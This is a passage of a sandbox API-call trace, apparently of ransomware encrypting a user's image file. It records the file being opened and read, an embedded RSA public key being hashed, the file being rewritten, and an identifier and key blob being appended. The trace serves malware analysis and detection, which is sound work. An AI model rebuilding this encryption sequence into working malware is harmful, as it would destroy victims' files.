(lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\NE4TCssID4OKfQf7Z.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ne4tcssid4okfqf7z.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.992] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=67644) returned 1 [0190.992] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.996] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10816, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.996] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.999] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.999] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1083c, lpOverlapped=0x0) returned 1 [0191.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.000] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.001] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.001] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.001] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.001] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.001] GetLastError () returned 0x0 [0191.001] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.001] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.002] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.002] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.002] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10840) returned 0x2af5168 [0191.003] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3588 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af35d0 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f48 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.009] GetCurrentThreadId () returned 0x5d8 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae55c8 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.010] GetCurrentThreadId () returned 0x5d8 [0191.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0191.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0191.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0191.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0191.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af35d0 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.020] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x10837, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x10837, lpOverlapped=0x0) returned 1 [0191.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.021] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1083c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.021] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.022] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.023] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.023] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, 